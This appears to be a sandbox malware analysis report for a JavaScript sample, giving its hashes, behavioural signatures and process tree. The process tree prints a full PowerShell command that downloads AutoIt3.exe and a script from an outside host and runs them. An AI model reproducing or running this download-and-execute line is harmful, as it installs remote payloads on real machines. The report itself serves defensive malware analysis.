Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
27-10-2023 16:16
Static task
static1
Behavioral task
behavioral1
Sample
28102023_0016_gov.js
Resource
win7-20231020-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
28102023_0016_gov.js
Resource
win10v2004-20231020-en
10 signatures
150 seconds
General
-
Target
28102023_0016_gov.js
-
Size
135KB
-
MD5
9121b311bbfab73d75f6aa47cd7fd3e6
-
SHA1
eebcf88387bdc926c1fc574a364d3b90fee1fbeb
-
SHA256
ff0d7fd40da4281a66a43f5971a795eb46f126b32992b55e2698eecd7dba07b1
-
SHA512
0fc718fa704ae5384404134dad9d654a2774b49912268f3ee8dbc2f70ee59cfcb3c987dc425ace3665aa66ded98e3b02db7e86db31010147d3c75a6968066866
-
SSDEEP
1536:rZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0N:yT9U7hgaX6eerjqlI2IO6Mzqf5X
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1060 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1284 wrote to memory of 1060 1284 wscript.exe 28 PID 1284 wrote to memory of 1060 1284 wscript.exe 28 PID 1284 wrote to memory of 1060 1284 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28102023_0016_gov.js1⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://profitcentronline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://profitcentronline.com:2351/msiumyprjkx' -OutFile 'umyprjkx.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'umyprjkx.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-